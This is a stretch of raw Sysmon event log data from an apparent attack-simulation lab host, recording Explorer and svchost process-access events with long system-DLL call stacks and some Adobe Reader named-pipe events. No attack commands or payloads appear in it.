DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\Explorer.EXE+dc3e5|C:\Windows\Explorer.EXE+6e771|C:\Windows\Explorer.EXE+4d787|C:\Windows\Explorer.EXE+49f72|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEB3B17)|UNKNOWN(FFFFF3D9DFEAE1A1)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEADE26)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\Explorer.EXE+51aca|C:\Windows\Explorer.EXE+8f773|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047032Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.215{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-E653-63C7-8F06-00000000AF02}6444C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047031Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.202{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\ole32.dll+8a360|C:\Windows\System32\ole32.dll+8c46e|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced|C:\Windows\system32\explorerframe.dll+1ac26|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+5888a 10341000x800000000000000047030Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.201{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x800000000000000047029Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.201{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x800000000000000047028Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.201{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x800000000000000047027Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.200{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x800000000000000047026Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.200{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x800000000000000047025Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.200{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x800000000000000047024Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.200{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x800000000000000047023Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.200{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x800000000000000047022Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.200{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x800000000000000047021Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.200{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x800000000000000047020Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.199{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x800000000000000047019Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.199{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 18141800x800000000000000047018Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:30:11.184{FE4C2B44-E650-63C7-8906-00000000AF02}3796\mojo.3796.6944.3314725047976494229C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe 17141700x800000000000000047017Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:30:11.184{FE4C2B44-E650-63C7-8906-00000000AF02}3796\mojo.3796.6944.3314725047976494229C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe 18141800x800000000000000047016Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:30:11.184{FE4C2B44-E650-63C7-8906-00000000AF02}3796\mojo.3796.6944.16612044230668180256C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe 17141700x800000000000000047015Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:30:11.184{FE4C2B44-E650-63C7-8906-00000000AF02}3796\mojo.3796.6944.16612044230668180256C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe 10341000x800000000000000047014Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.179{FE4C2B44-E650-63C7-8906-00000000AF02}37965768C:\Program Files (x86)\Adobe\Acrobat Reader 